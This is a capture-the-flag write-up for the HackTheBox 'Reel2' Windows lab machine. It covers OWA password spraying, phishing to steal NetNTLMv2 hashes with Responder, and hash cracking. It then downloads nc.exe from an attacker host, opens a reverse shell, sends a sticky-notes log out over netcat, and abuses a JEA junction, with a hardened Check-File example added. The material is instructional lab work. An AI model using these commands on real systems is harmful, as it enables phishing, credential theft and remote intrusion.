
Hackthebox Reel2 writeup

Introduction@Reel2:~$

Column       Details
Name         Reel2
IP           10.10.10.210
Points       40
OS           Windows
Difficulty   Hard
Creator      cube0x0
Out On       03 Oct 2020

Summary

  • Nmap shows three ports open.
  • Gather all the user names into a txt file.
  • Valid login creds obtained.
  • Log in to OWA at https://10.10.10.210/OWA
  • Found the k.svensson hash with the help of phishing.
  • Cracking the obtained NTLMv2 hash gives the password kittycat1.
  • Log in to the machine with a PSSession.
  • Get user.txt.
  • Looking at 000003.log, the password for jea_test_account is found.
  • Looking at the basic jea_test_account.psrc and .pssc, the Check-File command loads a file only if its path is under "C:\ProgramData".
  • Create a symlink (junction).
  • Use the Check-File command through the junction.
  • Get root.txt.

Pwned

Recon

Nmap


┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #nmap -sC -sV -oA nmap/result 10.10.10.210
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-10 09:48 EDT
Nmap scan report for 10.10.10.210
Host is up ( latency).
Not shown: 991 filtered ports
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: 403 - Forbidden: Access is denied.
443/tcp  open  ssl/https?
|_ssl-date: 2020-10-10T04:27:32+00:00; -9h23m25s from scanner time.
6001/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open  msrpc      Microsoft Windows RPC
6006/tcp open  msrpc      Microsoft Windows RPC
6007/tcp open  msrpc      Microsoft Windows RPC
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.32
|_http-title: Welcome | Wallstant
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -9h23m25s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address ( host up) scanned in 213.23 seconds

So basically three web ports are open: 80 (http), 443 (https) and 8080 (http-proxy).

Port-80

Enumerating HTTP, but the server only answers 403 Forbidden.

Port-443

Enumerating HTTPS.

Let's use gobuster to find directories.


┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.210
[+] Threads:        50
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/10 10:04:31 Starting gobuster
===============================================================
/public (Status: 302)
/exchange (Status: 302)
/Public (Status: 302)
/rpc (Status: 401)
/owa (Status: 301)

Let's go to /owa first.

Reel2.htb

Hmmm, a login page. Let's try some SQL injection.

But nothing works.

Port-8080

Reel2.htb

Let's create an account on the sign-up page.

Reel2.htb

Hmm, on the home page there are a lot of users.

Reel2.htb

Let's gather all the users and create a user.txt.

Example:


sven
svensson
s.svensson

Reel2.htb

Looking at all posts in the Posts tab, the svensson user's post gives us a hint: "This summer is so hot!"

Reel2.htb

So, let's create a pass.txt from this hint.



┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #cat /usr/share/wordlists/rockyou.txt | grep Summer > pass.txt


With user.txt and pass.txt, let's brute-force the OWA login.

But we don't brute-force the OWA login with wfuzz or hydra; we need to install a tool called SprayingToolkit.

Link : SprayingToolkit

Before running this tool, install its requirements.



pip3 install -r requirements.txt


Now, Let's run the tool



python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01


terminal

and after a couple of minutes we got the username and password.

terminal

  • Username = s.svensson
  • Password = Summer2020

    Let's log in with these credentials on port 443.

    Reel2.htb

    Hmm, the site is in another language. Let's open it in Chromium so we can understand what's going on.

    Reel2.htb

    Now I understand what's going on here: it's a mail server. I think we need to do some phishing.

    If you don't know about that, here is an interesting article.

    Link : NetNTLMv2 hash stealing using Outlook

    Reel2.htb

    So what we can do now is compose a new message.

    1. Click on New message.

    Reel2.htb

    2. Select all users with Control+A, then click the To button at the bottom. This will send our email to each and every user.

    Reel2.htb

    3. Give any subject you wish and, in the body, enter your HTB IP as http://10.10.XX.XX

    Reel2.htb

    Important: before sending this email, start Responder.

    responder -I tun0
    

    Reel2.htb

    Boom, after a couple of minutes we get a response back.

    Reel2.htb

    Now we need to crack this hash, but first let's identify what type of hash this is.

    Reel2.htb

    So now we know this is an NTLMv2 hash.

  • Let's check it on hashcat example hashes
  • Link : Example hashes

    Reel2.htb

    So now we know this hash is crackable. Let's crack it.

    hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force

    And the hash is cracked.

    Reel2.htb

    username = k.svensson
    password = kittycat1

    Evil-WinRM does not work in this situation because port 5985 is not open.

    So we use PowerShell on Linux to log in.

    But first, install PowerShell for Linux.

    sudo apt install gss-ntlmssp
    sudo apt-get install powershell

    After installation you can start PowerShell with pwsh.

    Now, Let's login with pwsh.

    ┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
    └──╼ #pwsh
    PS /root/Desktop/HTB/reel2 > $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson
    
    PowerShell credential request
    Enter your credentials.
    Password for user k.svensson: *********
    
    PS /root/Desktop/HTB/reel2 > Enter-PSSession $offsec_session
    [10.10.10.210]: PS>

    Reel2.htb

    Now commands like dir, ls, cd and whoami won't work, but $env:username and $env:domainname do.

    terminal

    We need to execute PowerShell commands inside a script block.

    Link : behavior of Out-Default

    So we use &{ command }.

    [10.10.10.210]: PS> &{ cd ../Desktop }
    [10.10.10.210]: PS> &{ ls }
    
    
    Directory: C:\Users\k.svensson\Desktop
    
    
    Mode                LastWriteTime        Length Name                             
    ----                -------------        ------ ----                             
    -a----        7/30/2020  1:19 PM          2428 Sticky Notes.lnk                 
    -ar---        10/9/2020  7:21 AM            34 user.txt                         
    
    
    [10.10.10.210]: PS> &{ type user.txt }

    terminal

    Now, let's turn this into a proper shell; for that we need to transfer nc.exe and get a reverse shell.

    1. Open a simple HTTP server (I use the apache2 service).

    terminal

    2. Transfer nc.exe to the target.

    After running that, open a netcat listener.
    [10.10.10.210]: PS> &{ iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'}
    [10.10.10.210]: PS> &{ cd 'C:\Windows\System32\spool\drivers\color\'}
    [10.10.10.210]: PS> &{ ./nc.exe 10.10.xx.xx 9001 -e powershell.exe}

    terminal

    Let's check our netcat listener

    terminal

    Boom, we got the shell. From now on we don't need the &{ } wrapper.

    Now that the reverse shell is obtained, it's time for enumeration.

    We found nothing in our enumeration process, so let's check the log files for anything interesting.

    cd /
    dir /s /b *.log

    terminal

    This shows a 000003.log file in our current user's directory. Let's look at that.

    terminal

    But when we use the type command to view 000003.log, it gives us gibberish.

    So we need to get that file onto our local machine.

    We use nc.exe to transfer the file.

    1. Open a listener on your local machine to receive the file content.

    nc -nvlp 1234 > 000003.log

    2. In the Windows reverse shell, type these commands (the port must match the listener above).

    PS C:\> cmd
    C:\> cd "C:\Windows\System32\spool\drivers\color\"
    C:\Windows\System32\spool\drivers\color> nc.exe 10.10.XX.XX 1234 < "C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb\000003.log"

    terminal

    Let's check our netcat listener.

    terminal

    Let's use the strings command to see the contents of 000003.log.

    terminal

    We got the username and password:

  • username = jea_test_account
  • password = Ab!Q@vcg^%@#1

    Privilege escalation

    Looking at the basic jea_test_account.psrc and .pssc, the Check-File command loads a file only if its path is under "C:\ProgramData".

    So what we can do is create a junction inside the ProgramData directory that points at the Administrator directory.

    Important: be sure you run this command in PowerShell.

    New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'

    terminal

    Now the command executes successfully.

    So when we log in with the jea_test_account account we can reach the Administrator directory through that junction as well.

    Now we need to log in as jea_test_account. Open a new terminal, type pwsh and run the commands one by one.

    ┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
    └──╼ #pwsh
    PS /root/Desktop/HTB/reel2 > $username = "jea_test_account"
    PS /root/Desktop/HTB/reel2 > $password = ConvertTo-SecureString "Ab!Q@vcg^%@#1" -AsPlainText -Force
    PS /root/Desktop/HTB/reel2 > $cred = New-Object System.Management.Automation.PSCredential -ArgumentList ($username, $password)
    PS /root/Desktop/HTB/reel2 > Enter-PSSession -ComputerName 10.10.10.210 -Credential $cred -ConfigurationName jea_test_account -Verbose -Debug -Authentication Negotiate
    [10.10.10.210]: PS> Check-File C:\programdata\root\Desktop\root.txt

    terminal

    And we pwned it.
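    The junction works because the role's Check-File only compares the string prefix of the path against C:\ProgramData. As an added example (this is not the box's own JEA code; the function body, the $allowedRoot value and the reparse-point walk are assumptions), here is how a defender would write that check so a junction or symlink under the allowed root is refused:

```powershell
# Added example: hardened Check-File for a JEA role capability.
# Assumption: the allowed root is C:\ProgramData, as in the writeup.
function Check-File {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Path)

    $allowedRoot = 'C:\ProgramData'

    # 1. Normalise the string form first (collapses ..\ segments and trailing slashes).
    $full = [System.IO.Path]::GetFullPath($Path)
    if (-not $full.StartsWith($allowedRoot + '\', [System.StringComparison]::OrdinalIgnoreCase)) {
        throw "Refused: '$Path' is outside $allowedRoot"
    }

    # 2. Walk every component under the root and refuse any reparse point
    #    (junction, symlink, mount point). A prefix check alone cannot see these,
    #    which is exactly what C:\ProgramData\root -> C:\Users\Administrator abused.
    $probe = $allowedRoot
    foreach ($segment in $full.Substring($allowedRoot.Length).Trim('\').Split('\')) {
        $probe = Join-Path $probe $segment
        $item = Get-Item -LiteralPath $probe -Force -ErrorAction Stop
        if ($item.Attributes -band [System.IO.FileAttributes]::ReparsePoint) {
            throw "Refused: '$probe' is a reparse point (target: $($item.Target))"
        }
    }

    # 3. Only now read the file, by literal path so no wildcard expansion occurs.
    Get-Content -LiteralPath $full -Raw
}
```

    This still races against a junction created between the walk and the read, so the stronger fix is to keep the role's readable directory somewhere the connecting user cannot write.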

    If you liked the writeup, support a student to get the OSCP cert: Donation for OSCP

    Resources

    Topic                    URL
    SprayingToolkit          https://github.com/byt3bl33d3r/SprayingToolkit
    NetNTLMv2 hash           https://www.ired.team/offensive-security/initial-access/netntlmv2-hash-stealing-using-outlook
    Example hashes           https://hashcat.net/wiki/doku.php?id=example_hashes
    behavior of Out-Default  https://stackoverflow.com/questions/18082746/can-you-change-the-......
    This post is licensed under CC BY 4.0


    © 2020 Dedinfosec . All rights reserved.